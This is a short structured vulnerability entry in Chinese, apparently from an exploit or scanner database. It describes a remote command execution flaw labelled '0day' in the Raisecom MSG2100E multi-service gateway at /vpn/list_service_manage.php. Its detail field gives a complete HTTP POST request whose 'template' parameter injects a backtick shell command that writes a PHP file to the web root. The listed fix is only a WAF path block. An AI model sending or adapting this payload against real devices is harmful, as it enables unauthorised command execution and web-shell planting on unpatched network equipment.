vendor = "瑞斯康达"
name = "瑞斯康达多业务智能网关 list_service_manage.php 存在远程命令执行漏洞"
type = "RCE"
version = "MSG2100E系列融合型多业务智能网关"
path = "/vpn/list_service_manage.php"
detail = "POST /vpn/list_service_manage.php?template=%60echo+-e+%27%3C%3Fphp+phpinfo%28%29%3B%3F%3E%27%3E%2Fwww%2Ftmp%2Finfo29.php%60 HTTP/1.1 Host: Content-Length: 111 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Nradius_submit=true"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "0day"
